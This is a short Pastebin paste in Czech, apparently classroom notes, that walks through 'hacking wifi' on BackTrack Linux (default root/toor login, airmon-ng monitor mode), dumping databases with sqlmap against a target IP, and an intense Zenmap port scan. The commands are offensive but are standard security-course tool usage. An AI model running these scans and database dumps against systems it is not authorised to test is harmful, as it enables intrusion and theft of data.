Advertisement
Guest User

Untitled

a guest
Dec 11th, 2017
89
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.76 KB | None | 0 0
  1. Hackhovani WIFI v backtracku linuxu
  2. 1.Zapnout backtrack
  3. 2.Uzivatel - root
  4. 3.Heslo - toor
  5.  
  6. 4.prikaz startx -> dostaneme se do GUI rozhrani
  7. 5.player->removable devices->atheros->Conect
  8. 6.Otevrit terminal
  9. 7. iwconfig
  10. //Nebezpečný způsob odchytávání
  11. 8.airmon-ng start wlan0
  12. //Vypne předchází příkaz
  13. 9.airmon-ng stop mon0(možná wan0 nvm)
  14. //Bezpečná cesta
  15. 10.ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up
  16. 11. airdump-ng wlan0
  17.  
  18.  
  19.  
  20. SQL injection
  21. ip - ip adresa cíle
  22. adresa - http://ip//index.php?value=1
  23. Příkaz sqlmap -u adresa --dbs (zobrazí dostupné databáze)
  24. Příkaz sqlmap -u adresa -D "název databáze" (přečte informace z databáze)
  25. Příkaz sqlmap -u adresa -D "název databáze" -T "název tabulky" -C "název sloupce" --dump
  26.  
  27. Příkazy od malaníka z výuky
  28.  
  29. Spuštění SQL map s detekovaným GET parametrem k vyzkoušení
  30. sqlmap -u http://ip/index.php?value=1
  31.  
  32. Spuštění SQL map s detekovaným POST parametrem k vyzkoušení
  33. sqlmap -u http://ip/index.php --data="value=1"
  34.  
  35. Spuštění SQL map s detekovanými POST parametryk vyzkoušení
  36. sqlmap -u http://ip/index.php --data="value=1&param=1"
  37.  
  38. Přepínače sqlmap
  39.  
  40. --dbs zobrazí dostupné databáze
  41. --tables zobrazí tabulky ve vybrané databázi
  42. --columns zobrazí sloupce ve vybrané tabulce
  43. --dump výpis zadaného sloupce tabulky
  44. -D <název BD> výběr databáze pro manipulaci
  45. -T <název tabulky> výběr tabulky pro manipulaci
  46. -C <název sloupce> výběr sloupce pro manipulaci
  47.  
  48.  
  49.  
  50.  
  51. Scan pomocí ZenMap (alternativa pro Zenmap je nmap)
  52. Příkaz ip addr -> zjistí IP
  53.  
  54. navigace k zenmapu
  55. applications->01 information gathering -> zenmap
  56.  
  57. Postup
  58. V zenmap napíšeme IPcíle do kolonky 'target', zvolíme 'intense scan' a 'all TCP/IP ports'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement